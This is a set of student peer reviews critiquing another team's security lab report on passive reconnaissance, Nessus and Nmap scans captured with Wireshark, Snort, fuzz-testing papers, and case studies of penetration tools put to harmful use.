The lab exercise appeared to be performed improperly for some stages of testing. For the ‘meta exploit’ test, which was to involve three hosts, the data presented almost certainly points to only two hosts being used. I find it likely that ‘Wireshark’ was run on the same machine which was designated to be the ‘attacker,’ and so find the reported data to be flawed. I think it should be obvious that if a ‘sniffer’ is run on the same machine as a ‘scanner,’ this ‘sniffer’ will naturally be privy to all the network traffic the ‘scanner’ is. This is not true when the ‘sniffer’ is run as a separate host on the network (at least in the virtual ‘switched’ network environment used in this experiment), and so I deem the results of the ‘meta exploit’ test to be fundamentally flawed. Furthermore, I question the assertion that ‘Nmap,’ and more so ‘Nessus’ are predominately biased in favor of Microsoft based operating systems. I, too, initially thought (before researching it) that this would be the case: but a cursory examination of the ‘Nessus plug-in’ link that is provided proves this is ‘resoundingly’ not true. I would ask: what evidence leads to this conclusion, as nothing which supports the ‘Microsoft’ argument is found in the write-up?
I find a number of problems present in the ‘hostile tools’ discussion ( 2B ) . Foremost, I do not find the case study chosen in relation to the ‘Metasploit’ framework to be relevant in the discussion: no flaw was found in the framework itself, rather, it was used by security professionals ‘to find’ a flaw in VML. How is this representative of a ‘hostile’ or ‘exploited’ penetration tool? I believe the ‘Netcat’ case study legitimate, but take exception to the ‘gaping security hole’ assertion. The abuse of a tool is not really ‘a security hole,’ nor do I think ‘Netcat’ a case of exceptional note. Any application, such as Mozilla Firefox, or telnet, or SSH, or notepad, ad infinitum can be used ‘abusively,’ yet I do not believe that many would classify the programs ‘to have gaping security holes’ because of this. Does a screwdriver have a ‘gaping security hole’ because it is often used to force locks?
Finally, I found the discussion on ways to counter these ‘hostile’ tools to be a bit vague. Many ‘name-able’ concrete methods are available in this area (MD5 hashes, Tripwire, jails, etc.), so why resort only to generalities? Additionally, the section which addressed the risks of untested or exploited penetration tools seemed to miss the point of the question entirely. The question asked is not about the dangers of penetration testing, but about the dangers of ‘trojan’ or ‘compromised’ tools used in penetration testing. I would submit the ‘real’ danger in this case is: that nothing unusual happens during the test, that no machines are taken down; and because of this no one notices that sensitive data is altered or stolen.
The group’s abstract talks about the different steps in the lab and how they will accomplish that part of the lab. The group briefly describes each part of the lab, but they do not tell what this lab is trying to convey very strongly. In the first sentence they say that the lab is about passive reconnaissance but nothing more. Instead of just going over each part of the lab in the abstract they should have discussed what the importance of this lab was, gave a brief definition of what passive reconnaissance is, and briefly described the results of the lab. Next the group goes into their literature review. The group starts off with a good description of what both papers are trying to convey. They talk about what passive reconnaissance is and the difference between blackbox testing and whitebox testing. The group does a good job in comparing the two papers that were given in this lab. The group gives their opinion on the paper by saying that they agree with Godefroid’s ideas of using whitebox testing instead of blackbox testing. The group then continues by giving an explanation of what Privacy Oracle is and how the Jung et al paper used Privacy Oracle to gather information leaks from many applications. Then the group talks about how Jung et al set up their test and the applications used in the test. Last in the literature review the group concludes with a discussion on the ups and downs of using blackbox testing on applications. In the literature review the group does a great job on describing the method of the papers and how they compare with each other. The group does not mention how these papers tie into this lab though. They do mention the theme of each of the papers at the beginning of the literature review, but they do not mention the question that the paper is trying to convey. Also the group does not go over any errors or omissions in the papers. Next the group starts the first part of the lab by creating a table that has the passive tools from the first lab’s table. The table was put together nicely. The table shows how the passive tools used in this lab tend to lean more toward the application layer more than any other layers. It also shows how most of the tools attack confidentiality more than integrity or availability. The group then gives their findings on a couple of questions given in the first part of the lab. They discovered that a good tool to use to recreate packet streams passively is Snort. Also in the findings they talk about how to slow down a tool or script and why that would aid in disguising the attack. Next the group goes into the second part of the lab. In this part the group started off by explaining how they obtained, installed and ran Nessus and Nmap on one of the virtual machines set up in the first lab. The group dedicated a lot of this section in describing how they set up and ran Nessus, but did not cover much of Nmap. This could have been because Nmap was easier to setup and ran. Next the group discussed their findings. They start by saying that because Nessus has a lot of tools it is easier to sieve through the information. They also mention that the attacks from Nessus will fit into the OSI model and McCumber’s cube. They do not give any type of data on how these attacks will fit into the OSI model or McCumber’s cube though. Next the group talks about the bias of Nessus and Nmap toward operating systems. The group mentions that Nessus is biased toward Windows operating systems because of their popularity. The group also mentions that Nmap does not have a bias, but could be used more on Windows systems more than others. Next the group described how they ran Wireshark against Nessus and Nmap. They did a nice job in explaining the command used to run the programs and how the test was set up. They explained how all the packets, both sent and received, were captured by showing an example of both. The group then discusses how the data from Wireshark can be used by an attacker to follow Nessus using Wireshark and gaining the information they need. They also mentioned briefly how an attack from Nessus can be seen using Wireshark. The group could have discussed more on how passive tools could be used to detect active attacks on a system. The group is looking at this from how an attacker can use this data to perform an attack. They do not look at this from someone who is trying to stop an attacker from compromising their network. In the next section the group does show how snort can be used in conjunction with Nessus and Wireshark to help prevent security testers from giving away important information when scanning a network. Last in this section the group does a nice job on concluding this part of the lab. They give some nice examples of how this information could help in preventing attacks on a network and some ideas of what needs to be done to a network to reduce the risks on a network. Next the group went into the last part of the lab. The group starts off explaining how tools that were once used to help networks are now being used to break into and exploit networks. They also explain that these tools can be obtained by both sides easily. The group puts together three case studies to show how penetration tools were used in a harmful way. The three tools that the group used were Metasploit, John The Ripper 1.0, and NetCat. In each case study the group does a good job in describing each tool. Then they tell how each tool can be used in a bad way. They back that up with giving a case study that uses the tool in a bad way to exploit a computer. Next the group discusses ways to ensure that the tools you are using are not hostile. The group gives some nice examples of how to determine if a program is hostile or not. They also mention that these methods do not insure that the program is safe, but are indicators. They mention that the best way to ensure the safety of a program is to allow users to examine the source code. The group then explains the process of auditing source code. They concentrate on the use of a tool called Pscan. I believe that the group could have expanded on this part of the lab better and showed how source code auditing occurs. In the last section of this part of the lab the group discusses how untested penetration tools can harm a company’s network. The group explains how using untested penetration tools can range from just slowing down a network to damaging the network. The group could have explained and given some examples of how this could have been done. At the end of the lab the group gave a description of some issues that they had with using the Debian VM. Then the group gave the conclusion to the lab. The conclusion does a nice job of going over what was done in each part of the lab. I believe that the group could have done a better job at describing the findings of each part of the lab and they could have given a better summery of what was learned in this lab.
I have to disagree with the statement “Whitebox testing is the same method as blackbox testing but it looks at the inside perspective. “While Whitebox testing involves help with the staff, blackbox testing is closer to what a hacker would do without the knowledge of the organization’s Information Technology team. In the statement “I think the best way to test the system is to see it from the inside perspective as opposed to blackbox testing, while looks at it from the outside perspective, which Privacy Oracle does”, what was the rationale for thinking that the inside perspective was better than the blackbox testing method? Without the rationale, that section seemed incomplete.
I have to disagree with the statement “The author purposed an alternative to whitebox fuzz testing. “
In the paper, Patrice Godefroid did not propose an alternative to whitebox fuzz testing, but gave an alternative to blackbox testing, which was whitebox fuzz testing.
Groups one’s method part one section did not contain any type of explanation, but only consisted of a table. The group should have stated how the table was to be set up and go into more detail about passive reconnaissance tools.
In the findings section the group stated that “One can make a script or tool slow down by setting the time for the attack to take longer”, but the group did not explain how this could be accomplished. However, I do agree with the group’s statement “Though, it will still be considered active as opposed to passive.”Slowing down the attack time would not change the nature of the tool but will only change the amount of time it takes to perform its functions.
I found it somewhat odd that group one had two separate methods section. What was the rationale for splitting the methods section into two separate sections? The group did a good job describing how they set up the Nessus in their virtual environment, but the description of Nmap was somewhat skimpy.
In the findings section, I have to partially disagree with the statement “This does allow an attacker sieve the information more quickly. This is because it only takes a few packets for Nessus to discover a vulnerable port on the target system.” With the ability to discover over 1000 vulnerabilities, Nessus would find more vulnerabilities, but with the more plug-ins that are installed, the longer it would take for Nessus to locate all of potential vulnerabilities. In the statement “I think that if the Nessus vulnerabilities were put into a grid, like the tools have been in previous labs, patterns would emerge”, the group said a pattern would emerge, but they did not say what that pattern would be. I have to disagree with the statement “Based on the numbers obtained from http://www.nessus.org/plugins/index.php?view=all, most of the vulnerabilities pertain to Windows operating systems (Tenable Network Security, 2009)” because several of those plug-ins were Unix/Linux based as well. In the statement “When an attacker performs an Nmap or Nessus scan against a network, it’s a good idea to slow down the attack to prevent an IDS system from detecting the scan”, the group did not explain how this could be accomplished.
The group did a good job answering the questions in section 2b.
Team 1 begins with an abstract describing the goals and procedures of their lab project. They proceed with a literature review of the articles that were assigned reading for this week. Team 1 describes the difference between blackbox and whitebox testing. They make the statement that they believe that whitebox testing is better. I don’t believe it’s a matter of choosing whether blackbox or whitebox fuzz testing is better. The methods have their own specific purposes. In the article on Privacy Oracle, they are testing proprietary software, and therefore likely don’t know the internal structure of the source code. Their goal is not to test the internal operation of the program for errors, but to determine if it is sending private information to a third party. Team 1 included a list of applications that were tested using Privacy Oracle. The list of applications is a bit unnecessary here since our goal isn’t to learn what applications they tested but what techniques they used in testing, how those techniques relate to our lab, what the testing results were, and what we can deduce from the results.
Team 1 describes the procedures and findings from testing Nessus and nmap. They discuss running Nessus and nmap while running Wireshark and how the packets from the scan could be captured by an attacker. They introduce Snort, which is an intrusion detection and prevention system (IDS/IPS). They discuss how slowing a tool may help to avoid detection from an IDS system. Their findings are that it is possible to gain telemetry from an active tool by using a passive tool because both sides of the conversation are captured. Our own tests show that effective packet sniffing depends largely on the where the packet sniffer is placed. To effectively capture all of the packets the packet sniffer needs to be placed in a position that the packets would pass through.
Team 1 includes a case study of an Internet Explorer vulnerability that was found. I believe that Internet Explorer falls outside the bounds of “network penetration tools” as described in our assignment. They also include a discussion on how attackers can use Netcat and John the Ripper as attack tools. I believe the goal of the lab was to find network penetration tools that had been exploited to be hostile against the users of the tool. These are simply tools that can be used for good or evil, depending on whose hands they fall into.
They then include several good suggestions for protecting the organization against exploited tools. They include a brief discuss tools and procedures for testing source code. They conclude this section with a discussion of the risks of using untested or exploited penetration tools. They make a comparison between white box penetration testing and black box penetration testing.
In my opinion Team 1 spent too much effort describing how they installed the tools and not enough effort explaining what they did with the tools and what was discovered. I believe their inclusion of Internet Explorer falls far outside the definition of a network penetration tool as required by the lab assignment.
The team first starts with their abstract and identifies that they will be looking at passive attacks for this lab. They the go onto the literature review and describe the papers that where read. They do a good job comparing and contrasting and even putting their thoughts into the discussion of the topics. One thing that could help, as I told the other groups is to seek out additional information that may support your stance or could strength the arguments between the literature. The team then goes into the methodologies and explains what they are going to do and the tools that they will be using. Then the thing that threw me off was the multiple findings section. In the future putting together the findings and then splitting that into sections will create a more organized lab. When upon more reading it was noticed that this group had installed Nessus onto a Linux Operating System rather than one of the Microsoft Operating System. Was there a particular reason that this was done? Also the fact that Nessus is more gear to find vulnerabilities in Windows is an agreeable statement. However do you think that this might change in the future when another operating system becomes king? Are windows systems the onslaught to numerous attacks because of it wide use? This being that an attacker would want to get the more “bang for his or her buck” when going after a system. Next the authors go onto discuss the second part of the methodologies section and it was noticed that the findings for this section was inner twined within the section some and was not posted in response to the actions they took. This made review the lab a little more difficult, which may have caused some confusion upon this readers thought. They did however describe what would some of the criteria for using a tool within an enterprise or company setting would be deemed appropriate. It is too often that there are administrators that become lazy and try to find the quickest way to do things which may not be the best or standard way. This helps others create a checklist of approved tools for such uses as checking for any vulnerabilities. Which of the tools that where used in the lab is considered hostile or non-hostile? What would allow for standard use outside the lab environment? The team then goes onto discuss the issues that they had with the lab and it was an issue with storage on the vm’s that affected multiple teams. They then go on to finish up with there conclusion and what they found based upon the lab. The conclusion seemed a little simple but it did do the purpose in describing what they learned within lab three.
The team started with a strong abstract and indicating key points of there laboratory. They covered different tools that the team was going to use for scanning packets. There literature review was in very depth. They covered blackbox and whitebox testing as the main topic of reading. At the end of the literature review the team asks a question, does the software itself need to be tested before it can be used to test other application?
Software should be reviewed and tested before with known results, otherwise software that compiles correctly may not function as desired or incorrectly. Using software that has not been properly tested is like taking a prototype car out for a high speed test, speeds exceeding 110, with out check to see of the ball joints are properly install or if they can handle speeds greater than fifty five miles per hour. Production products without testing them can result in improper telemetry readings. These improper reading can give a false positive or false negative. If the tool allows for a user to prevent from being detected, is used without testing, and the tools reports a false negative, then the tools has failed at the purpose the tool was created for. Anther way to look at this, is if a tool was created for defending and was not tested or reviewed. There would be no way of knowing if the tool is accurately severing it’s purpose. This defensive tool may not be defending at all and attackers now have a sure way into the network.
The team then has a chart in methods part 1. The chart is well organized and easy to read. Perhaps a short paragraph explaining the chart would have been great for readers, especially readers that have not read the laboratory report. Readers, such as people outside this class would greatly appreciate an explanation. For part 2a, I understand that the Debian VM is short on space after installing packages, however why choose Ubuntu as the replacement VM? If you already have Backtrack why recreate another VM when most of the tools are already installed on backtrack. Backtrack was used later in the lab report. Nessus was the only program missing from Backtrack, there are tutorials available for install Nessus on backtrack. There was even on posted on Blackboard. Another question would be why use a Linux VM? If the VM was too small on space why not switch to a Windows machine, the software required can be obtained for both operating systems.